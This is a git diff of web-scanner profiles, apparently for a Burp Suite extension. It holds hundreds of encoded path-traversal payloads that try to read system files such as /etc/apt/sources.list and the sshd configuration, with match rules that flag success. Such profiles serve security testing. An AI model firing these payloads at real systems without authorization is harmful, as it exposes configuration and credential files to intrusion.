"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,.\\..\\{FILE}", + "true,.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,../{FILE}", + "true,../..//{FILE}", + "true,../..//../{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,..\\{FILE}", + "true,..\\..\\\\{FILE}", + "true,..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..///{FILE}", + "true,../..///{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//..///{FILE}", + "true,../..//../..//../..//../..///{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,deb http" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-source-list", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Linux-source-list", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "etc/apt/sources.list", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-sshd-conf.bb b/profiles/Linux-sshd-conf.bb index c353771..42e7c29 100755 --- a/profiles/Linux-sshd-conf.bb +++ b/profiles/Linux-sshd-conf.bb @@ -1 +1,950 @@ -[{"Name":"Linux-sshd-conf","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c